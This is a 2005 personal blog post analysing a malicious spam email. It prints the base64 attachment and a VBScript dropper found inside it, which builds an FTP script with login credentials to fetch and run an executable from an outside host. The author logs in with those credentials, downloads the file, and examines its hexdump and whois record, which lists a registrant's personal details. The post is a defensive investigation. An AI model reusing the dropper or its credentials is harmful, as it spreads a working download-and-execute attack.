mathr / blog / #

Spam can hide nasty secrets...

So the other day I got an email:

From - Fri May 27 23:52:32 2005
X-Account-Key: account3
X-UIDL: 30db7b2dbab83eba4e8de694cbb999ae
X-Mozilla-Status: 0001
X-Mozilla-Status2: 10000000
X-Apparently-To: <myaddress>@yahoo.co.uk via 217.12.10.40; Fri, 27 May 2005 22:18:42 +0000
X-YahooFilteredBulk: 62.194.167.229
Authentication-Results: mta105.mail.ukl.yahoo.com
from=gamebox.net; domainkeys=neutral (no sig)
X-Originating-IP: [62.194.167.229]
Return-Path: <wil_beike@gamebox.net>
Received: from 62.194.167.229  (EHLO h167229.upc-h.chello.nl) (62.194.167.229)
by mta105.mail.ukl.yahoo.com with SMTP; Fri, 27 May 2005 22:18:42 +0000
by h167229.upc-h.chello.nl (Postfix) with ESMTP id QOH8O3X16D
for <<myaddress>@yahoo.co.uk>; Fri, 27 May 2005 18:20:13 +0000
Date: Fri, 27 May 2005 18:20:13 +0000
From: Ken <wil_beike@gamebox.net>
X-Mailer: The Bat! (v3.0) UNREG / HPICQ9J9UAPIYSLDB
X-Priority: 3 (Normal)
Message-ID: <689146984975.10756168720543581@h167229.upc-h.chello.nl>
Subject: We make a business offer to you
MIME-Version: 1.0
Content-type: multipart/mixed;
boundary="----------N0FUQTL08W64CNLJ"

------------N0FUQTL08W64CNLJ
Content-Type: text/plain;
charset="Windows-1252"
Content-Transfer-Encoding: 8bit

Hello!

It is not spam, so don't delete this message.
We have a business offer to you.
You can increase the business in 1,5 times.
We hope you do not miss this information.

Best regards, Jackie

------------N0FUQTL08W64CNLJ
Content-type: application/octet-stream;
name="agreement.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="agreement.zip"

ieOWUKoIFpNERWo2baJCGiWRm6QmlCZpcSEHjIS9Xid27V1315aJxKEFCSpOOfTAAVEqFamqhBSQ
6IEKkb+A5oQ4BokjSG2VSw/N8mZ2N1lvbDmNWqIq+ykzb/bNzPfevBnHfmOv3GtfvfHj4b/AgVHw
wLoeBL9NR7C0Ww9hgIipW9d13VSB7sCwJqq5UpkvpOS5SmpOGol+MJZgqugoH9KkMl/V5rV5qVAY
EVUpVZaUdF4Sy0eiVWOiwPqi/Bt8KDViDRXUiswfiXaLSlErSWI33yfyxYuZnMqPDyVn35memJlN
JBMLWlkqDvQn0SDf08NL4rzCVzRJ5WW5tBCrSmlBLBVkWUCW0dHUxpDsW/0nC+fzGbsunZNT6oJd
M4eeF4vZgX5B+kRiZnNyRqlqNWaTGyPsUy9VcmXzOVsu8b3aUIrvlfneDHMsu+kVHZGRCjwb2tRE
9Oixo/FUQZMwVFU2UhALiibxoeE+I5ajzs1B/PP9MpyGoBe3LvKbsbMRVqOGYGmFdD6dH1sdW3We
EMBZHfDKCwD8V4QVsnVIDXS9rWnbwkesTpqUVNrbjeRBG0OJNJfoPHxqSks/zgHcQXnNfN6pDCAP
/kGIM563I7tQPkK5hhz/YvSz+Czg84tb4rO57msNwt7MP8G0e6tBPJ28zvm3GkjaH6rD43wOcPX9
du5Ts3138lE/Prb5Y8Hqd87fKSw+y/5V6xxBPvPwzl3iXMe3ZlwarXt3sH+3HXCxuzD/z7vYkyDW
/j/ebU9c/N8gYNt/F3sSpBNeXVrp45dWR15bCrREsby++J2vC0v30m4758KFi2eLCLRhVkLgQ5RW
Hw7eHIZYD7wEJwJXxs90wruTnTBzhoPzWC5O/u2FODJRtnhdtn7GxtWykQhlezNwxU40CB7GM1iX
Z4DxeGp5OA/lqYnKMJyKPdRvoATogAlkySJPBSNQRpZz2FaxzLG6BPOoi2OUZOx1grB4scSQ3Y1Z
77cegI3P3l5b22fOo/0ttpau08i3wRSuRUS7CmhYssyfcbZDJRCgE9tDkMRRC6ifQL2IXhfRf+qb
hj1VFosqm5HBKAlY01F6DC5vJsTLj94n9dJjLmxbVgxzWVpRB9/uWEQVx/k9Pq+P83i/dCS51015
Ac1TdzR0bxplFeV76AA9XjL2nwgvEg58PsKRFj/nazGnhW1Ul2mVwAUWIY0z6aEciDLr+/xejsLr
qbMJFKdw0TnzIEcx4g8CVw8BrKCv82zIN4nQF9exGHNIDYOxkZ+Ht2otTZfTrIsdQQ3TDX8ZDyZg
/XRgHEddjzj0zV5QzfpduHDhwoULFy5cuHiuQJMX+uGY5i40D6X5J/3NB8286O86gmB8a7kPjCSW
fv2dHhtYntBT9Bvx5T/iWSoPgJHF0/nH4QIm5GlMyaUnsmuVVuCYfXp+qdzOnAB1KmzYnzVvQpx3
Jdv15TDaJ7D5u6ftzAGbfcKSySImkzMYhfwTxyCCr177fja050AeLPvG69jF3gTB3feEjPPrDxrX
JMvGEYkfwmoqJ6qKpmTL/KyiZvgJRawUJbnM3hOmElSHKnY/R9uC1S8MwtrJny49jXcoF88S/wFQ
dP9QSwUGAAAAAAEAAQA8AAAAVwUAAAAA

------------N0FUQTL08W64CNLJ--

I was thrilled! Increase my business in 1,5 times?? Why yes please!

Anyway, figuring I run Linux and the attachment is guaranteed to be a Windows virus, I thought I'd investigate further. By unzipping the attachment to see what's in it, using the file tool to see what type of file it is, and taking a close look!

$mkdir sandbox$ cd sandbox
$unzip ../agreement.zip Archive: ../agreement.zip inflating: agreement.txt$ ls -l
total 12
-rw-r--r--  1 claude claude 10752 May 27 17:33 agreement.txt?
$ls -lQ total 12 -rw-r--r-- 1 claude claude 10752 May 27 17:33 "agreement.txt\240"$ file a*
agreement.txt : Microsoft Office Document
$more a* ÐÏà¡±á>þÿ þÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ<script language="VBScript"> set wshshell=createobject("wscript.shell" ) a=wshshell.run ("%comspec% /c mkdir C:\WINDOWS\System32\VBS && echo user nnpy@we b.cplnn.com>>a && echo f729lQjd>>a && echo binary>>a && echo get mmf32.exe C:\Wi ndows\System32\VBS\mmf32.exe>>a && echo quit>>a && ftp -s:a -n -d nnpyf.cplnn.co m && del a && C:\Windows\System32\VBS\mmf32.exe",0,False) window.close </script>ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿì¥ÀE ¿bjbjBàBà ^L ÿÿÿÿÿÿ]\\\\\\\p --More--(6%) Hmm, this gives full instructions on how to get the virus payload, of course the "agreement.txt\240" helps out people who aren't ftp savvy by doing all the hard work for them! How considerate! Time to fire up ncftp and see how far I can get... $ ncftp -u nnpy@web.cplnn.com -p f729lQjd ftp://nnpyf.cpl
NcFTP 3.1.8 (Jul 27, 2004) by Mike Gleason (http://www.NcFTP.com/contact/).
Remote host has closed the connection.
Redialing (try 1)...
ProFTPD 1.2.10 Server (ProFTPD Default Installation) [217.107.212.179]
Logging in...
User nnpy@web.cplnn.com logged in.
Logged in to nnpyf.cplnn.com.
Current remote directory is /.
ncftp / > binary
ncftp / > get mmf32.exe
mmf32.exe:                                              35.50 kB    7.29 kB/s
ncftp / > quit

Hmm, I don't think I'll risk running the exe, maybe a hexdump will be enlightening? But first, let's see who we're dealing with:

$whois cplnn.com Whois Server Version 1.3 Domain names in the .com and .net domains can now be registered with many different competing registrars. Go to http://www.internic.net for detailed information. Domain Name: CPLNN.COM Registrar: ONLINENIC, INC. Whois Server: whois.OnlineNIC.com Referral URL: http://www.OnlineNIC.com Name Server: NS1.NAMESELF.COM Name Server: NS2.NAMESELF.COM Status: ACTIVE Updated Date: 20-mar-2005 Creation Date: 20-mar-2005 Expiration Date: 20-mar-2006 >>> Last update of whois database: Sun, 29 May 2005 20:39:17 EDT <<< Registrant: Sergey Litvinov sspwife_2003@mail.ru +7.3007193627 Private Person Abay str. 79-34 Semipalatinsk,Semipalatinskaya,KAZAKSTAN 487000 Domain Name:cplnn.com Record last updated at 2005-03-20 19:45:29 Record created on 2005/3/20 Record expired on 2006/3/20 Domain servers in listed order: ns1.nameself.com ns2.nameself.com Administrator: Sergey Litvinov sspwife_2003@mail.ru +7.3007193627 Private Person Abay str. 79-34 Semipalatinsk,Semipalatinskaya,KAZAKSTAN 487000 Domain Name:cplnn.com Record last updated at 2005-03-20 19:45:29 Record created on 2005/3/20 Record expired on 2006/3/20 Domain servers in listed order: ns1.nameself.com ns2.nameself.com Administrator: Sergey Litvinov sspwife_2003@mail.ru +7.3007193627 Private Person Abay str. 79-34 Semipalatinsk,Semipalatinskaya,KAZAKSTAN 487000 Technical Contactor: Sergey Litvinov sspwife_2003@mail.ru +7.3007193627 Private Person Abay str. 79-34 Semipalatinsk,Semipalatinskaya,KAZAKSTAN 487000 Billing Contactor: Sergey Litvinov sspwife_2003@mail.ru +7.3007193627 Private Person Abay str. 79-34 Semipalatinsk,Semipalatinskaya,KAZAKSTAN 487000 Registration Service Provider: name: Regtime.net tel: +7 8462788201 fax: +7 8462788201 web:http://www.webnames.ru Now that's out of the way, here's the edited highlighs of the hexdump: 00000000 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 |MZP.............| 00000010 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 |........@.......| 00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 |................| 00000040 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 |........!..L.!..| 00000050 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 |This program mus| 00000060 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 |t be run under W| 00000070 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 |in32..$7........|
00000080  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

Oooh, look! It gives a handy hint that you need a non-ancient version of Windows.

00008a60  08 00 00 00 00 00 00 00  00 00 00 00 6b 65 72 6e  |............kern|
00008a70  65 6c 33 32 2e 64 6c 6c  00 56 69 72 74 75 61 6c  |el32.dll.Virtual|
00008a80  41 6c 6c 6f 63 00 56 69  72 74 75 61 6c 46 72 65  |Alloc.VirtualFre|
00008a90  65 00 56 69 72 74 75 61  6c 50 72 6f 74 65 63 74  |e.VirtualProtect|
00008aa0  00 45 78 69 74 50 72 6f  63 65 73 73 00 00 00 00  |.ExitProcess....|
00008ab0  00 75 73 65 72 33 32 2e  64 6c 6c 00 4d 65 73 73  |.user32.dll.Mess|
00008ac0  61 67 65 42 6f 78 41 00  77 73 70 72 69 6e 74 66  |ageBoxA.wsprintf|
00008ad0  41 00 4c 4f 41 44 45 52  20 45 52 52 4f 52 00 54  |A.LOADER ERROR.T|
00008ae0  68 65 20 70 72 6f 63 65  64 75 72 65 20 65 6e 74  |he procedure ent|
00008af0  72 79 20 70 6f 69 6e 74  20 25 73 20 63 6f 75 6c  |ry point %s coul|
00008b00  64 20 6e 6f 74 20 62 65  20 6c 6f 63 61 74 65 64  |d not be located|
00008b10  20 69 6e 20 74 68 65 20  64 79 6e 61 6d 69 63 20  | in the dynamic |
00008b20  6c 69 6e 6b 20 6c 69 62  72 61 72 79 20 25 73 00  |link library %s.|
00008b30  54 68 65 20 6f 72 64 69  6e 61 6c 20 25 75 20 63  |The ordinal %u c|
00008b40  6f 75 6c 64 20 6e 6f 74  20 62 65 20 6c 6f 63 61  |ould not be loca|
00008b50  74 65 64 20 69 6e 20 74  68 65 20 64 79 6e 61 6d  |ted in the dynam|
00008b60  69 63 20 6c 69 6e 6b 20  6c 69 62 72 61 72 79 20  |ic link library |
00008b70  25 73 00 90 91 6f 01 00  a2 6f 01 00 b5 6f 01 00  |%s...o...o...o..|
00008b80  00 00 00 00 6b 65 72 6e  65 6c 33 32 2e 64 6c 6c  |....kernel32.dll|
00008b90  00 00 00 47 65 74 50 72  6f 63 41 64 64 72 65 73  |...GetProcAddres|
00008ba0  73 00 00 00 47 65 74 4d  6f 64 75 6c 65 48 61 6e  |s...GetModuleHan|
00008bb0  64 6c 65 41 00 00 00 4c  6f 61 64 4c 69 62 72 61  |dleA...LoadLibra|
00008bc0  72 79 41 00 00 00 00 00  00 00 00 00 00 00 00 00  |ryA.............|
00008bd0  84 6f 01 00 74 6f 01 00  00 00 00 00 00 00 00 00  |.o..to..........|
00008be0  00 00 00 00 78 70 01 00  cd 70 01 00 00 00 00 00  |....xp...p......|
00008bf0  00 00 00 00 00 00 00 00  83 70 01 00 d5 70 01 00  |.........p...p..|
00008c00  00 00 00 00 00 00 00 00  00 00 00 00 90 70 01 00  |.............p..|
00008c10  dd 70 01 00 00 00 00 00  00 00 00 00 00 00 00 00  |.p..............|
00008c20  9d 70 01 00 e5 70 01 00  00 00 00 00 00 00 00 00  |.p...p..........|
00008c30  00 00 00 00 aa 70 01 00  ed 70 01 00 00 00 00 00  |.....p...p......|
00008c40  00 00 00 00 00 00 00 00  b5 70 01 00 f5 70 01 00  |.........p...p..|
00008c50  00 00 00 00 00 00 00 00  00 00 00 00 c1 70 01 00  |.............p..|
00008c60  fd 70 01 00 00 00 00 00  00 00 00 00 00 00 00 00  |.p..............|
00008c70  00 00 00 00 00 00 00 00  75 73 65 72 33 32 2e 64  |........user32.d|
00008c80  6c 6c 00 61 64 76 61 70  69 33 32 2e 64 6c 6c 00  |ll.advapi32.dll.|
00008c90  6f 6c 65 61 75 74 33 32  2e 64 6c 6c 00 61 64 76  |oleaut32.dll.adv|
00008ca0  61 70 69 33 32 2e 64 6c  6c 00 75 73 65 72 33 32  |api32.dll.user32|
00008cb0  2e 64 6c 6c 00 77 73 6f  63 6b 33 32 2e 64 6c 6c  |.dll.wsock32.dll|
00008cc0  00 77 69 6e 69 6e 65 74  2e 64 6c 6c 00 05 71 01  |.wininet.dll..q.|
00008cd0  00 00 00 00 00 17 71 01  00 00 00 00 00 2a 71 01  |......q......*q.|
00008ce0  00 00 00 00 00 3a 71 01  00 00 00 00 00 4b 71 01  |.....:q......Kq.|
00008cf0  00 00 00 00 00 5e 71 01  00 00 00 00 00 6b 71 01  |.....^q......kq.|
00008d00  00 00 00 00 00 00 00 47  65 74 4b 65 79 62 6f 61  |.......GetKeyboa|
00008d10  72 64 54 79 70 65 00 00  00 52 65 67 51 75 65 72  |rdType...RegQuer|
00008d20  79 56 61 6c 75 65 45 78  41 00 00 00 53 79 73 46  |yValueExA...SysF|
00008d30  72 65 65 53 74 72 69 6e  67 00 00 00 52 65 67 53  |reeString...RegS|
00008d40  65 74 56 61 6c 75 65 45  78 41 00 00 00 54 72 61  |etValueExA...Tra|
00008d50  6e 73 6c 61 74 65 4d 65  73 73 61 67 65 00 00 00  |nslateMessage...|
00008d60  57 53 41 53 74 61 72 74  75 70 00 00 00 49 6e 74  |WSAStartup...Int|
00008d70  65 72 6e 65 74 52 65 61  64 46 69 6c 65 00 00 00  |ernetReadFile...|
00008d80  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

Hmm, a reference to GetKeyboardType - I wonder why it needs to do that, could it possibly be to latch into the keyboard system and log every single keypress? Also, some kind of reference to internet things (InternetReadFile, but note that information can be transmitted by the act of reading a specific url - you're telling the server what page you are getting!), so I imagine this program logs all your key presses and sends them to some server on the web - better not do any internet banking if you run this bad boy! And some registry stuff (advapi32.dll - I looked up what it does on teh intarwebs), probably to make it run on startup every startup.

So, the moral of the story is, don't open any unsolicited email attachments!! Especially if you're running Windows!

Take care of yourself, and your computer.

Monoide - Strategy (Kazooo Rmx)

geeky

motherboard 3 power